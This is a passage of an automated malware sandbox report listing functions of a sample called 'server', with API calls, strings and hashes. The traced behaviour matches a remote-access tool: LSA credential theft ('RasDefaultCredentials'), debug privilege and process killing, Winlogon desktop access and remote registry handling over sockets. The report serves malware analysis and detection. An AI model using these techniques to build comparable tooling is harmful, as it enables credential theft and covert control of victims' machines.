                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInstance
                                • String ID: FriendlyName
                                • API String ID: 542301482-3623505368
                                • Opcode ID: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
                                • Instruction ID: afc3467e9830297f3d24d847b1d2bb17e406cd0b2032fd1a6252cdea2ef9d69a
                                • Opcode Fuzzy Hash: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
                                • Instruction Fuzzy Hash: 6B4118B1204341AFD610CF54CD84F5BB7E9FBC9B24F108A18B599DB290DB75E905CB62
                                Function 1000D0A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D0FB
                                • DeleteFileA.KERNEL32(?), ref: 1000D1A8
                                  • Part of subcall function 1000CF40: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72
                                  • Part of subcall function 1000CF40: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
                                  • Part of subcall function 1000CF40: GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
                                  • Part of subcall function 1000CF40: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$DirectorySystem$??2@CreateDeleteSize
                                • String ID: .key$XXXXXX
                                • API String ID: 2930496114-2601115946
                                • Opcode ID: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
                                • Instruction ID: 92a9d9676dfbc10a34597c778cdfdecbd90440fd8d0599ce9f46a22b4502f86a
                                • Opcode Fuzzy Hash: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
                                • Instruction Fuzzy Hash: 5B310436A005085BD728DAB888527AEBB96FB84770F14036EFA27872C0DFF45D458290
                                Function 1000A540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: mallocstrrchr
                                • String ID: D
                                • API String ID: 4015919094-2746444292
                                • Opcode ID: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
                                • Instruction ID: 2b82c579dc5669429a94ef84c94f4a8368c9f4a2e82ed412c6c1b6dee6f6c207
                                • Opcode Fuzzy Hash: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
                                • Instruction Fuzzy Hash: C5115BB62042104BE704DA28AC406AB77DAF7D5732F04053EFE46C7340DABA994EC7B2
                                Function 100071B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2
                                • LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 10007205
                                Strings
                                • L$_RasDefaultCredentials#0, xrefs: 100071B5
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: DataOpenPolicyPrivateRetrieve
                                • String ID: L$_RasDefaultCredentials#0
                                • API String ID: 1655749231-2801509457
                                • Opcode ID: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                                • Instruction ID: 93c318e700ec90dad194951c1228eb78b341e21d1d7da0fe05d388e2d6e220d4
                                • Opcode Fuzzy Hash: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                                • Instruction Fuzzy Hash: C401D8722043026FE704DA69CC81DBBB3D9EBD4254F408D2DF544C6180EA74E949C3A2
                                Function 1000A620 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strrchr
                                • String ID: Ball Update$D
                                • API String ID: 3418686817-2654422192
                                • Opcode ID: 648673b69d33e9f8df7bed818b0523f87ebe886c01c8110b764cbfd1cf2ca8ba
                                • Instruction ID: af045223c8d01c426d59768339580e9410ad83be0f7cb1058ad73a08f3e68785
                                • Opcode Fuzzy Hash: 648673b69d33e9f8df7bed818b0523f87ebe886c01c8110b764cbfd1cf2ca8ba
                                • Instruction Fuzzy Hash: 4FF049710082515BE700DB2CDC51BDB37F9EBC3765F840539FA8582250E779858E86E7
                                Function 00405093 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
                                • LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167
                                • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,oD@ ,?,00000000,00000000,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 0040518C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: String$ByteCharMultiWide
                                • String ID: oD@
                                • API String ID: 352835431-4270158488
                                • Opcode ID: 1a3e656dce507ef5684df938aa75e947694e038f5f6d888d555c42b369e4d593
                                • Instruction ID: 4358d16d81b6b97c962036346be1bb4ce46d92d5ac57d3850fb05990df2a4d70
                                • Opcode Fuzzy Hash: 1a3e656dce507ef5684df938aa75e947694e038f5f6d888d555c42b369e4d593
                                • Instruction Fuzzy Hash: C2112832900619ABDF228F94DD00ADFBBB5EB48394F108166FA11761A0D3368D60DF94
                                Function 10009EB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • OutputDebugStringA.KERNEL32(s Loop_RegeditManager(SOCKET sRemote)), ref: 10009ED7
                                  • Part of subcall function 10003780: WSAStartup.WS2_32(00000202,?), ref: 100037ED
                                  • Part of subcall function 10003780: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB
                                  • Part of subcall function 10003940: ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
                                  • Part of subcall function 10003940: socket.WS2_32 ref: 10003966
                                • OutputDebugStringA.KERNEL32(s !socketClient.Connect !=-1), ref: 10009F23
                                  • Part of subcall function 10003880: WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
                                  • Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038DF
                                  • Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038E8
                                  • Part of subcall function 10003880: WSACleanup.WS2_32 ref: 100038EA
                                Strings
                                • s !socketClient.Connect !=-1, xrefs: 10009F1E
                                • s Loop_RegeditManager(SOCKET sRemote), xrefs: 10009ED2
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDebugEventHandleOutputString$CleanupCreateObjectResetSingleStartupWaitsocket
                                • String ID: s !socketClient.Connect !=-1$s Loop_RegeditManager(SOCKET sRemote)
                                • API String ID: 660129190-2143064718
                                • Opcode ID: cf6971e579b135155909e727a0b979c8128c65cc8493ae3f99d5ed024adca8a6
                                • Instruction ID: e6927e26891a02968b8d8c746bac23e7cdf3acfa35c335dd7adad3e8361e2961
                                • Opcode Fuzzy Hash: cf6971e579b135155909e727a0b979c8128c65cc8493ae3f99d5ed024adca8a6
                                • Instruction Fuzzy Hash: E1119EB50087819AE364DFA4D941B9BB798EF94760F008A0DE5A9632C5DF34290CCB73
                                Function 10011F00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                  • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 10011F33
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 10011F3E
                                • CloseHandle.KERNEL32(00000000), ref: 10011F45
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Open$CloseCurrentHandleTerminateToken
                                • String ID: SeDebugPrivilege
                                • API String ID: 3822579153-2896544425
                                • Opcode ID: 88327105c846fcc13900bef19591bfffc91d2265c3eb9a717cc263b54f5821ef
                                • Instruction ID: 462bede0e6496ce79bcfb719127096f46805a777cb0c1315f10224566a174b47
                                • Opcode Fuzzy Hash: 88327105c846fcc13900bef19591bfffc91d2265c3eb9a717cc263b54f5821ef
                                • Instruction Fuzzy Hash: 21F0F4366003516BE228EB549C86FBF779AEFC0755F14042DFB415E241DBB4BC4682B2
                                Function 10012B10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25threadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 10012B11
                                • GetThreadDesktop.USER32(00000000), ref: 10012B18
                                  • Part of subcall function 10012AC0: OpenDesktopA.USER32(?,00000000,00000000,400001CF), ref: 10012AD3
                                • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 10012B44
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: DesktopThread$CurrentMessageOpenPost
                                • String ID: Winlogon
                                • API String ID: 1322334875-744610081
                                • Opcode ID: 396b67e399f582221f47aa72e7d8659033b76d44156f69e5a7280715aeba948b
                                • Instruction ID: 8ff4991761b0dff3829612d51007d4e4f7b3ebdfccf44ddc9c980502df986e38
                                • Opcode Fuzzy Hash: 396b67e399f582221f47aa72e7d8659033b76d44156f69e5a7280715aeba948b
                                • Instruction Fuzzy Hash: EDE086B2A413A027F62167707C8AFEB22059F05740F054030FA029E181E7B4DEE251E2
                                Function 10011370 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,PeekNamedPipe), ref: 1001138A
                                • GetProcAddress.KERNEL32(00000000), ref: 10011391
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: PeekNamedPipe$kernel32.dll
                                • API String ID: 2574300362-3402591003
                                • Opcode ID: 37be9f72f6ca300e1428dd39efc81c674823f9abed165e292987da6a783efa52
                                • Instruction ID: 1234715f33eb3a59c65f095741a8430bc1c869571d7f7331aa22a25da0abe920
                                • Opcode Fuzzy Hash: 37be9f72f6ca300e1428dd39efc81c674823f9abed165e292987da6a783efa52
                                • Instruction Fuzzy Hash: B3C09B70401B74E7FB049BB04D4C7453665D6457013404701F791D5124C77855C1EF19
                                Function 10011470 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,WaitForMultipleObjects), ref: 1001148A
                                • GetProcAddress.KERNEL32(00000000), ref: 10011491
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: WaitForMultipleObjects$kernel32.dll
                                • API String ID: 2574300362-425320575
                                • Opcode ID: ff427f7aa768ca3a8ed3ff132f2c19765d7d1b01677b2b3afdfe7a8a9e40baff
                                • Instruction ID: bb72085c76fc3cd786db20b2684e91290bb1d992f234a8e5dbf67af8a632e61f
                                • Opcode Fuzzy Hash: ff427f7aa768ca3a8ed3ff132f2c19765d7d1b01677b2b3afdfe7a8a9e40baff
                                • Instruction Fuzzy Hash: B7C09B71401BA4D7FB049BB04D8C6453665D6457153504601F78199120C77854C1E65E
                                Function 00401730 Relevance: 6.5, APIs: 5, Instructions: 246COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f273f069ea18d1aa5b4337fc6a977d5543074f6f7179b24e1d4bdb7c5cae4ea
                                • Instruction ID: e05905e1c01977d2d0b956cff86eb2a38737ca1d4fd010b57140b871a74b783a
                                • Opcode Fuzzy Hash: 2f273f069ea18d1aa5b4337fc6a977d5543074f6f7179b24e1d4bdb7c5cae4ea
                                • Instruction Fuzzy Hash: 33716673A002107BDB227A268D40BAB3A699B417A4F15413BFC55BB2F1DB38DE41D2DC
                                Function 004026BF Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                Download Yara Rule
                                APIs
                                • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00402F62), ref: 004026E0
                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00402F62), ref: 00402704
                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00402F62), ref: 0040271E
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00402F62), ref: 004027DF
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00402F62), ref: 004027F6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AllocVirtual$FreeHeap
                                • String ID:
                                • API String ID: 714016831-0
                                • Opcode ID: 8f3c31f509a3233290b576d4393d2cb65234ee27b82ca2d76f99f18585f5a399
                                • Instruction ID: a04098866118948378d325ab6d9eb96549c892597020e1ecc4c4a2e7dacd7581
                                • Opcode Fuzzy Hash: 8f3c31f509a3233290b576d4393d2cb65234ee27b82ca2d76f99f18585f5a399
                                • Instruction Fuzzy Hash: E831E274640705ABD330CF24ED89B26BBA0FB44B94F10453AE156A77D0E7B8A8459B8C
                                Function 100011B0 Relevance: 6.3, APIs: 5, Instructions: 56stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(76F90F00,?,00000000,76F90F00,00000000,10002605,00000000,?), ref: 100011CE
                                • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 100011D8
                                • strchr.MSVCRT ref: 100011FA
                                • strchr.MSVCRT ref: 10001213
                                • atoi.MSVCRT(00000001), ref: 10001220
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strchr$??2@atoilstrlen
                                • String ID:
                                • API String ID: 3786266066-0
                                • Opcode ID: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                                • Instruction ID: fbe44b17f1b507f99859eaa0b90b0c883dd8256749a52aba7323050170f11358
                                • Opcode Fuzzy Hash: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                                • Instruction Fuzzy Hash: E501F5326003645FEB00DF699C847ABB7DAEFCA351F040069EA04DB301D7B16905CB62
                                Function 1000ECD0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                Download Yara Rule
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED36
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000ED88
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED98
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000EDF6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@$Open
                                • String ID:
                                • API String ID: 2374869923-0
                                • Opcode ID: be878bee1e9da73a1a5f096cd974a78e79cbd151493b477e63510d5e1f51a3d3
                                • Instruction ID: e9e04c6913910b47a72650e0984c01a22b61d2a3179dad928c464d9a0ff9bdc2
                                • Opcode Fuzzy Hash: be878bee1e9da73a1a5f096cd974a78e79cbd151493b477e63510d5e1f51a3d3
                                • Instruction Fuzzy Hash: 1731E2756046854FD308DE29CC91A6BB3DAEB88750F44492DF906E3385EB35ED09C792
                                Function 1000EB40 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EBA6
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EBF8
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EC08
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EC62
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
